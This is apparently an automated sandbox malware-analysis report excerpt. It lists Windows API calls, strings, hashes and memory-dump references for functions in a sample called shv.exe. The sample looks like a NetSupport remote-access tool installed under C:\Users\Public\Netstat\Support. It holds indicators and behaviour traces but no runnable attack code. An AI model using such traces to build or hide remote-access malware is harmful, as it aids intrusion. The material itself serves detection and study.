Function 00007FF70E79EA5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF70E79E95F,?,?,?,00007FF70E79463A,?,?,?), ref: 00007FF70E79EA63
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF70E79E95F,?,?,?,00007FF70E79463A,?,?,?), ref: 00007FF70E79EA6E

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00007FF70E79EA78

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: ErrorLastObjectSingleWait
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1211598281-2248577382
Opcode ID: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
Instruction ID: 88ffe9194739e1079862a43d9336f10f3fa92eae6b8f6b3fe626f4bcb307b508
Opcode Fuzzy Hash: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
Instruction Fuzzy Hash: DAE01A25E19C4282F600B721EC46478A260BFAD774FD02331D03E811F59F2CA98A8321

Function 00007FF70E79A43C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF70E79A447
FindResourceW.KERNEL32 ref: 00007FF70E79A45D

Strings

RTL, xrefs: 00007FF70E79A453

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
Instruction ID: 8423ba80202caec56ee9540ec4f538f502301282e40b91b7f10762698925ea5a
Opcode Fuzzy Hash: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
Instruction Fuzzy Hash: 85D01791F0964682FF196B75E84937462945F1CB51F88603CC94E06390EF2DA0C8C761

Analysis Process: shv.exePID: 5552, Parent PID: 2788COMMON

Execution Graph

Execution Coverage:	5.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	15.1%
Total number of Nodes:	2000
Total number of Limit Nodes:	108

Executed Functions

Function 1109E190 Relevance: 100.3, APIs: 42, Strings: 15, Instructions: 501
filethreadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 1109D440: GetCurrentProcess.KERNEL32(000F01FF,?,11030063,00000000,00000000,00080000,461C6054,00080000,00000000,00000000), ref: 1109D46D
Part of subcall function 1109D440: OpenProcessToken.ADVAPI32(00000000), ref: 1109D474
Part of subcall function 1109D440: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D485
Part of subcall function 1109D440: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D4A9

LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,461C6054,00080000,00000000,00000000), ref: 1109E225
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109E23E
SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109E249
GetVersionExA.KERNEL32(?), ref: 1109E260
GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E2CE
SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109E2E3
FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E2F4
CreateFileMappingA.KERNEL32(000000FF,11030063,00000004,00000000,?,?), ref: 1109E330
GetLastError.KERNEL32 ref: 1109E33D
LocalFree.KERNEL32(?), ref: 1109E366
LocalFree.KERNEL32(?), ref: 1109E373
GetLastError.KERNEL32 ref: 1109E390
MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109E3AE
LocalFree.KERNEL32(?), ref: 1109E3D9
LocalFree.KERNEL32(?), ref: 1109E3E6

Part of subcall function 1109D3A0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109E27E), ref: 1109D3A8

Part of subcall function 1109D3F0: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109D404

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E412
LocalFree.KERNEL32(?), ref: 1109E4DB
LocalFree.KERNEL32(?), ref: 1109E4E8
_memset.LIBCMT ref: 1109E500
GetTickCount.KERNEL32 ref: 1109E508
GetCurrentProcessId.KERNEL32 ref: 1109E5B4
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E5CF
CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109E61B
GetLastError.KERNEL32 ref: 1109E624
GetLastError.KERNEL32(00000000), ref: 1109E62B
CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109E660
GetLastError.KERNEL32 ref: 1109E669
GetLastError.KERNEL32(00000000), ref: 1109E670
CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109E6A6
GetLastError.KERNEL32 ref: 1109E6AF
GetLastError.KERNEL32(00000000), ref: 1109E6B6
CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109E6EB
GetLastError.KERNEL32 ref: 1109E6FA
GetLastError.KERNEL32(00000000), ref: 1109E6FD
LocalFree.KERNEL32(?), ref: 1109E725
LocalFree.KERNEL32(?), ref: 1109E732
GetCurrentThreadId.KERNEL32 ref: 1109E763
CreateThread.KERNEL32(00000000,00002000,Function_0009DD20,00000000,00000000,00000030), ref: 1109E77D
ResetEvent.KERNEL32(?), ref: 1109E7AC
ResetEvent.KERNEL32(?), ref: 1109E7B2
ResetEvent.KERNEL32(?), ref: 1109E7B8
SetEvent.KERNEL32(?), ref: 1109E7BE

Strings

cant create filemap, xrefs: 1109E375
Error creating filemap (%d), xrefs: 1109E344
SeSecurityPrivilege, xrefs: 1109E1FA
Cant create event %s, e=%d (x%x), xrefs: 1109E639, 1109E67E, 1109E6C4, 1109E707
cant create thread, xrefs: 1109E78A
Error cant map view, xrefs: 1109E3BB
Error cant create events, xrefs: 1109E7E7
cant create events, xrefs: 1109E7F4
IPC(%s) created, xrefs: 1109E7C8
map exists, xrefs: 1109E4EA
Error filemap exists, xrefs: 1109E4BD
warning map exists, xrefs: 1109E490
Info - reusing existing filemap, xrefs: 1109E479
cant map, xrefs: 1109E3E8
S:(ML;;NW;;;LW), xrefs: 1109E288

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
API String ID: 3291243470-2792520954
Opcode ID: e1e4d2c24c486b94928180782bcaf8fbecda1daffafc4b641c279d7d38800a12
Instruction ID: e0f3534def007632db5cc521867dfefedb1bc63d92e862916d16df31d0e36df5
Opcode Fuzzy Hash: e1e4d2c24c486b94928180782bcaf8fbecda1daffafc4b641c279d7d38800a12
Instruction Fuzzy Hash: 221282B590026D9FE724DF61CCD4EAEF7BABB88308F0049A9E11997244D771AD84CF51

Function 6D1D7030 Relevance: 91.4, APIs: 21, Strings: 31, Instructions: 406
threadlibrarysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6D1C2A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 6D1C2ACB
Part of subcall function 6D1C2A90: _strrchr.LIBCMT ref: 6D1C2ADA
Part of subcall function 6D1C2A90: _strrchr.LIBCMT ref: 6D1C2AEA
Part of subcall function 6D1C2A90: wsprintfA.USER32 ref: 6D1C2B05

Part of subcall function 6D1DDBD0: _malloc.LIBCMT ref: 6D1DDBE9
Part of subcall function 6D1DDBD0: wsprintfA.USER32 ref: 6D1DDC04
Part of subcall function 6D1DDBD0: _memset.LIBCMT ref: 6D1DDC27

LoadLibraryA.KERNEL32(WinInet.dll), ref: 6D1D7057
InitializeCriticalSection.KERNEL32(6D20B898), ref: 6D1D70DF
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6D1D70EF
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6D1D7115
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6D1D713B
WSAStartup.WSOCK32(00000101,6D20B91A), ref: 6D1D7167
_malloc.LIBCMT ref: 6D1D71A3

Part of subcall function 6D1E1B69: __FF_MSGBANNER.LIBCMT ref: 6D1E1B82
Part of subcall function 6D1E1B69: __NMSG_WRITE.LIBCMT ref: 6D1E1B89
Part of subcall function 6D1E1B69: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,6D1ED3C1,6D1E6E81,00000001,6D1E6E81,?,6D1EF447,00000018,6D207738,0000000C,6D1EF4D7), ref: 6D1E1BAE

_memset.LIBCMT ref: 6D1D71D3
_calloc.LIBCMT ref: 6D1D7214
_malloc.LIBCMT ref: 6D1D728B
_memset.LIBCMT ref: 6D1D72C1
_malloc.LIBCMT ref: 6D1D72CD
_memset.LIBCMT ref: 6D1D7303
GetTickCount.KERNEL32 ref: 6D1D7361
CreateThread.KERNEL32(00000000,00004000,6D1D6BA0,00000000,00000000,6D20BACC), ref: 6D1D737E
SetThreadPriority.KERNEL32(00000000,00000001), ref: 6D1D73AC
GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Netstat\Support\,00000104), ref: 6D1D7430
GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,mode,00000000,C:\Users\Public\Netstat\Support\pci.ini), ref: 6D1D74B0
GetModuleHandleA.KERNEL32(nsmtrace), ref: 6D1D74C0
CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 6D1D7566
timeBeginPeriod.WINMM(00000001), ref: 6D1D7573

Strings

C:\Users\Public\Netstat\Support\, xrefs: 6D1D742A, 6D1D7438, 6D1D744C
sv.subset.subset, xrefs: 6D1D72A6
mode, xrefs: 6D1D74A1
_debug, xrefs: 6D1D7502, 6D1D7519, 6D1D753C, 6D1D754C
General, xrefs: 6D1D733F
sv.hRecvThreadReadyEvent, xrefs: 6D1D7104
nsmtrace, xrefs: 6D1D74B6
NSM165348, xrefs: 6D1D7257
sv.subset.omit, xrefs: 6D1D72E8
*DisconnectTimeout, xrefs: 6D1D733A
Trace, xrefs: 6D1D7547
TraceSend, xrefs: 6D1D74DB, 6D1D7514
TraceRecv, xrefs: 6D1D74CF, 6D1D74FD
301389, xrefs: 6D1D7242
pci.ini, xrefs: 6D1D748F
Support\, xrefs: 6D1D7451
(iflags & CTL_REMOTE) == 0, xrefs: 6D1D73C2
C:\Users\Public\Netstat\Support\pci.ini, xrefs: 6D1D7481, 6D1D749B
NetworkSpeed, xrefs: 6D1D73D7
0/#v, xrefs: 6D1D70E5
WinInet.dll, xrefs: 6D1D7052
TraceFile, xrefs: 6D1D7537
sv.hRecvThread, xrefs: 6D1D7397
sv.s, xrefs: 6D1D71BE
htctl.packet_tracing, xrefs: 6D1D74A8
sv.hResponseEvent, xrefs: 6D1D712A
sv.gateways, xrefs: 6D1D722F
HTCTL32, xrefs: 6D1D7036
e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6D1D70FF, 6D1D7125, 6D1D714B, 6D1D71B9, 6D1D722A, 6D1D72A1, 6D1D72E3, 6D1D7392, 6D1D73BD
*CMPI, xrefs: 6D1D731F
sv.ResumeEvent, xrefs: 6D1D7150

Memory Dump Source

Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true

Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd

Yara matches

Similarity

API ID: Create$_malloc_memset$EventModule$FileNameThread_strrchrwsprintf$AllocBeginCountCriticalHandleHeapInitializeLibraryLoadMutexPeriodPriorityPrivateProfileSectionStartupTick_calloctime
String ID: (iflags & CTL_REMOTE) == 0$*CMPI$*DisconnectTimeout$0/#v$301389$C:\Users\Public\Netstat\Support\$C:\Users\Public\Netstat\Support\pci.ini$General$HTCTL32$NSM165348$NetworkSpeed$Support\$Trace$TraceFile$TraceRecv$TraceSend$WinInet.dll$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$htctl.packet_tracing$mode$nsmtrace$pci.ini$sv.ResumeEvent$sv.gateways$sv.hRecvThread$sv.hRecvThreadReadyEvent$sv.hResponseEvent$sv.s$sv.subset.omit$sv.subset.subset
API String ID: 3301999572-2125502763
Opcode ID: ef7da8a858402fdeb2c829b4549874ab9ab0861288e5a4992896128f6efbeb83
Instruction ID: 113ca0ed8ca6c588af7df8218b4b4a9b6038b6632901afc936d3f24ad69a3547
Opcode Fuzzy Hash: ef7da8a858402fdeb2c829b4549874ab9ab0861288e5a4992896128f6efbeb83
Instruction Fuzzy Hash: 99D1C5F1D44309AFEB209F258CC8B2B7BB8EB1934CB45442EF54AD7246D7B59840DBA1

Function 11029590 Relevance: 88.0, APIs: 38, Strings: 12, Instructions: 534
libraryloadernetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(WinInet.dll,461C6054,762323A0,?,00000000), ref: 110295C5
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102965F
SetLastError.KERNEL32(00000078), ref: 11029673
_malloc.LIBCMT ref: 11029697
GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 110296B1
GetLastError.KERNEL32 ref: 110296D2
_free.LIBCMT ref: 110296DE
_malloc.LIBCMT ref: 110296E7
GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029701
GetProcAddress.KERNEL32(?,InternetOpenA), ref: 1102973B
InternetOpenA.WININET(11194244,?,?,000000FF,00000000), ref: 1102975A
SetLastError.KERNEL32(00000078), ref: 11029764
SetLastError.KERNEL32(00000078), ref: 11029771
SetLastError.KERNEL32(00000078), ref: 1102977B
_free.LIBCMT ref: 11029785

Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D

GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029805
SetLastError.KERNEL32(00000078), ref: 1102981E
GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11029831
InternetConnectA.WININET(000000FF,11199690,00000050,00000000,00000000,00000003,00000000,00000000), ref: 1102984E
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102986A
SetLastError.KERNEL32(00000078), ref: 11029883
GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 110298A9
GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 110298FD
GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 11029A63
SetLastError.KERNEL32(00000078), ref: 11029B30
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029B82
SetLastError.KERNEL32(00000078), ref: 11029B99
FreeLibrary.KERNEL32(?), ref: 11029BAA

Strings

HttpOpenRequestA, xrefs: 110298A3
HttpSendRequestA, xrefs: 110298F7
InternetQueryOptionA, xrefs: 110296AB, 110296FB
InternetErrorDlg, xrefs: 110299A0
GET, xrefs: 110298C9
InternetOpenA, xrefs: 11029735
://, xrefs: 110297A5
WinInet.dll, xrefs: 110295BD
InternetQueryDataAvailable, xrefs: 11029A5D
InternetCloseHandle, xrefs: 11029659, 110297FF, 11029864, 11029B7C
HttpQueryInfoA, xrefs: 11029943
InternetConnectA, xrefs: 1102982B

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorLast$FreeInternetLibrary_free_malloc$ConnectHeapLoadOpen
String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
API String ID: 921868004-913974648
Opcode ID: 36508fb7aa93ad5402a0a829a6fade002c528e1580f22bfa2ed00e1b157900af
Instruction ID: e81a0880bf89439be6f70403065d0babe3f5b16467f55efefddb7e1ac6149969
Opcode Fuzzy Hash: 36508fb7aa93ad5402a0a829a6fade002c528e1580f22bfa2ed00e1b157900af
Instruction Fuzzy Hash: 5E127FB0D04269EBEB11CFA9CC88A9EFBF9FF88754F604569E465E7240E7705940CB60

Function 11061C90 Relevance: 76.5, APIs: 22, Strings: 21, Instructions: 1221COMMON

Download Yara Rule

APIs

Part of subcall function 11144EA0: GetLastError.KERNEL32(?,0316B898,000000FF,?), ref: 11144ED5
Part of subcall function 11144EA0: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,0316B898,000000FF,?), ref: 11144EE5

_fgets.LIBCMT ref: 11061DC2
_strpbrk.LIBCMT ref: 11061E29
_fgets.LIBCMT ref: 11061F2C
_strpbrk.LIBCMT ref: 11061FA3
__wcstoui64.LIBCMT ref: 11061FBC
_fgets.LIBCMT ref: 11062035
_strpbrk.LIBCMT ref: 1106205B

Strings

enforce, xrefs: 11062136
ACM, xrefs: 11062697
expiry, xrefs: 11062730
licensee, xrefs: 11062A53
product, xrefs: 11062652
inactive, xrefs: 110625B1
shrink_wrap, xrefs: 11062636
_version, xrefs: 11062429
Client, xrefs: 11062262, 110622A4
?starT, xrefs: 11062771, 1106277D
%c%04d%s, xrefs: 11062184
cd_install, xrefs: 1106261B
Expired, xrefs: 1106296B
?expirY, xrefs: 11062768
_License, xrefs: 11062356, 11062414, 1106242E, 110625B6, 11062620, 1106263B, 11062657, 11062751, 11062970, 11062A58
start, xrefs: 11062739, 11062750
%s.%04d.%s, xrefs: 110622A9
defaults, xrefs: 11062116
_include, xrefs: 110621C9
_checksum, xrefs: 1106240F
/- , xrefs: 110627FE, 11062831, 11062864

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
API String ID: 716802716-1571441106
Opcode ID: 251bcea0830c1b0ee278ad7eb02bf479ba28029f9b4baf519d3e84d78acdf809
Instruction ID: 9b454a0e08db4b844aa329f9a873b431930d9d904307df7fc69ae15b9a8492e5
Opcode Fuzzy Hash: 251bcea0830c1b0ee278ad7eb02bf479ba28029f9b4baf519d3e84d78acdf809
Instruction Fuzzy Hash: 55A2D375E0461A9FEB21CF64CC80BEFB7B9AF44345F0041D9E849A7281EB71AA45CF61

Function 11143570 Relevance: 66.6, APIs: 20, Strings: 18, Instructions: 134
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,762323A0), ref: 111435A3
LoadLibraryA.KERNEL32(?), ref: 111435EC
LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 11143605
LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 11143614
GetModuleHandleA.KERNEL32(?), ref: 1114361A
GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 1114362E
GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1114364D
GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 11143658
GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 11143663
GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1114366E
GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11143679
GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 11143684
GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1114368F
GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1114369A
GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 111436A5
GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 111436B0
GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 111436BB
GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 111436C6
GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 111436D1
GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 111436DC

Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E

Strings

SymGetLineFromAddr, xrefs: 11143628
DBGHELP.DLL, xrefs: 111435FF, 11143604
MiniDumpWriteDump, xrefs: 111436D3
SymLoadModule, xrefs: 11143686
SymGetSymFromAddr, xrefs: 111436BD
StackWalk, xrefs: 11143673
IMAGEHLP.DLL, xrefs: 1114360E, 11143613, 11143619
SymGetModuleInfo, xrefs: 111436B2
SymInitialize, xrefs: 11143691
SymGetLineNext, xrefs: 1114364F
SymMatchFileName, xrefs: 11143665
SymFunctionTableAccess, xrefs: 111436C8
SymGetLinePrev, xrefs: 1114365A
dbghelp.dll, xrefs: 111435C8
SymGetLineFromName, xrefs: 11143647
SymSetOptions, xrefs: 111436A7
SymCleanup, xrefs: 1114367B
SymGetOptions, xrefs: 1114369C

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
